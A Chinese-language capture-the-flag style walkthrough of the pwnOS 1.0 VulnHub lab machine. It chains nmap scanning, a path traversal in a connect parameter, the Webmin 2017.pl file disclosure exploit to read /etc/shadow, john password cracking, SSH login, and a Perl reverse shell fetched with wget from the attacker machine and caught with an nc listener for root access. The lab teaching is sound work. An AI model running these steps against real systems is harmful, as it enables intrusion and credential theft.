靶场下载地址
https://www.vulnhub.com/entry/pwnos-10,33/
靶场信息介绍
如果VMware询问您是否在第一次启动时复制或移动了此虚拟机,请单击已移动!否则,网络设置可能会被打乱。
虚拟机当前设置为使用桥接网络,但您可能希望将其更改为NAT或仅主机...具体取决于您的首选项
一、信息收集
目标主机发现。扫描本地网络c端,查看有无新增主机。
nmap -sn 192.168.10.0/24
以10000的速度对目标主机进行第二次详细扫描
nmap --min-rate 10000 -p- 192.168.10.29
此时发现目标主机开放了22,80,139,139,445,10000端口。我们把信息记录下来。
接下来我们用tcp协议的方式对目标主机开放的端口进行详细扫描。
nmap -sT -sC -sV -O -p22,80,139,445,10000 192.168.10.29
我们将得到的信息记录下来,一遍需要的时候反复查看,确认攻击思路.
接下来我们使用udp的方式对目标主机进行扫描
nmap -sU 192.168.10.29
我们这时候还是把信息记录下来,为后续的思路反复观看。
使用脚本扫描对已发现的端口进行漏洞探测
nmap -sT -sC -sV -O -p22,80,139,445,10000 192.168.10.29
思路总结:这时候发现存在漏洞,优先比较dos在渗透攻击中动静比较大比较暴力一般优先级往后,ssh协议暴力破解没啥技术含量,如果是强口令破解起来浪费时间基本上攻击顺序也是排后。这时候还发现存在webmin的文件泄漏,也算一个可利用的漏洞。我们先把扫到的信息记录起来,方便后续思路的整理。
知识点
#-sT 以tcp的方式进行扫描,不安全,慢
#-sC 使用脚本进行扫描,耗时长
#-sV 对端口上的服务程序版本进行扫描
#-O 对目标上的os操作系统版本进行扫描
#-sU UDP扫描,慢,可得到有价值的服务器程序
#--script=vuln 用脚本扫描出一些可执行的存在漏洞
二、web渗透
首先我们打开他的web页面,可以发现80端口和10000端口是可以打开的,80端口是一个普通的静态页面,而10000端口则是这个网站的管理员后台,
查看网站源码
从信息收集环节我们得知了此台主机的操作系统内核为liunx2.6.22,我们可以尝试对网站进行文件包含测试
我们在url处输入‘,发现出发报错信息
根据报错我们得知网站可能存在漏洞,我们在connect=参数的后面接上liunx的目录
../../../etc/passwd
此时我们已经获得了目标主机/etc/passwd的内容,我们对主机里的用户进行分析拆解
curl 'http://192.168.10.29/index1.php?help=true&connect=../../../etc/passwd'
三、漏洞利用
我们通过信息收集和web的渗透已经得知存在webmin的文件泄漏漏洞,还暴露出了该主机的用户。借来下来我们将利用webmin 漏洞进行攻击
通过searchsploit查找攻击渗透模块
searchsploit webmin
选择下载Arbitrary File Disclosure | multiple/remote/2017.pl任意文件泄漏攻击模块
searchsploit -m 2017.pl
使用任意文件泄漏攻击模块攻击目标主机/etc/shadow文件,使其信息泄漏
perl 2017.pl 192.168.10.29 10000 /etc/shadow 0
*知识点
/etc/passwd是存放用户信息的文件
/etc/shadow存放的则是用户的密码
此时我们已经获得了各用户的密码。
四、密码破解
我们将需要登陆的用户密码另存为文件passwd
使用字典对获得的加密数据进行暴力破解获取用户的密码
john passwd --wordlist=/usr/share/wordlists/rockyou.txt
获得密码,这时候可以通过ssh协议进行登陆
ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@192.168.10.29
成功进入目标主机!(此处应有背景音乐)
五、提权
我们通过webmin文件泄漏得到shadow文件内容,shadow文件权限较高,我们可以推倒得出是存在提权漏洞的,此时我们需要构造一个反弹的shell进行提权
构造反弹shell
cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi
修改配置参数
架设php服务
php -S 0:80
操纵vmware用户获取反弹shell并执行反弹shell
wget http://192.168.10.33/shell.cgi
给权限
chmod 777 shell.cgi
kali攻击机监听1234端口
sudo nc -lvnp 1234
通过perl执行反弹shell
perl 2017.pl 192.168.10.29 10000 /home/vmware/shell.cgi 0
查看监听端口1234得到回传
输入whoami查看权限
已得到管理员权限,ip地址也是靶机攻击地址
成功提权